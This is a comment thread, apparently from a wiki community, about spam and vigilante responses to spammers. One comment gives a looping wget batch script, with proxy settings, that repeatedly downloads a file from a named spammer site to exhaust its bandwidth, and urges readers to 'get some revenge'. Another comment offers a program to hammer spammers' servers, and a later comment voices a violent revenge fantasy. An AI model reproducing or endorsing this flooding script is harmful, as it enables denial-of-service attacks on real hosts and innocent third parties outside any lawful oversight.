Oh, so I am just considered premium graded spam. Hmnf. I wonder how it would feel like to be graded as genuine. Sigh.

klarchen, you are not any grade of spam... you just persist in writing to the spam account. i've written you from my real account befored, only to see the replies come to the hotmail account...

i'm talking about the automated type of spam as in that found at what_would_you_say and a few other pages I can't seem to find right now. I can code a program to sit in your status bar and repeatedly hit their servers. it'll eat your bandwidth (but I'll of course provide a 'pause' function) but if enough people use it it'll cause the spammers some grief. let me know.

*sigh* i know it's not ethical, I know that I should just leave it to law enforcement etc etc, but I don't think they're effective at all (spammers operate in countries where the law isn't so harse on spamming, plus gathering evidence is hard). anyway, I wrote a small script to repeatedly download an email-harvesting application from spammer website. download wget () and then save this as spam.bat in the wget directory: :start wget http://www.northworks.biz/install_ms_shareware.exe -O c:\foo goto start if you're behind a proxy, use this: set http_proxy=http://yourproxyhere :start wget http://www.northworks.biz/install_ms_shareware.exe --proxy-user=yourproxyusername --proxy-pass=yourpassword -O c:\foo goto start the wget line (up to but not including "goto start") should be all on one line use Ctrl-C to pause or stop it. At some point I'll develop this into something better (more targets, anonymous proxy lists, etc, etc) in the mean time, get some revenge :-)

thescambaiter.com thecarpcstore.com/phpbb2/ and lots more I'm researching (in between revising for my exams..). There's also a group who do honeypot and malware analysis which sounds pretty interesting :-) more links at http://tinyurl.com/qz3kn I'll put a 'spam' tag up on my del_ico_us with more links later I didn't knock northworks offline if that's what you were thinking; i think their bandwidth just peaked, or their hosting company got touchy.. i'm hosting a mirror of the specialham forum (they turned off access and their site has been on and off for a while) at puremango.co.uk/printable.htm yay for questionable ethics!

rather than letting dallas know as and when they're found, I thought it better to get a collection of pages requiring attention and have them reverted in bulk; this would save his time and give us a record as to the extent of the problem.

whenever i hit the "go" button and come across this stuff (and i'm talking about the *real* spam, like the yahoo search bullshit), it makes me want to track down the person responsible for it and hammer nails into every single tender part of their body. maybe that's a little harsh. but hey, they cut jagged scars into something that is, for the most part, beautiful. that kind of disrespect and abuse of the freedom this place allows...well, it bothers me. on another level, the scars make me appreciate the beautiful parts that much more. because in the end, all that spam amounts to little more than a pimple on a giant blue body. gentle but thorough exfoliation, followed by adequate moisturization. that's the key.
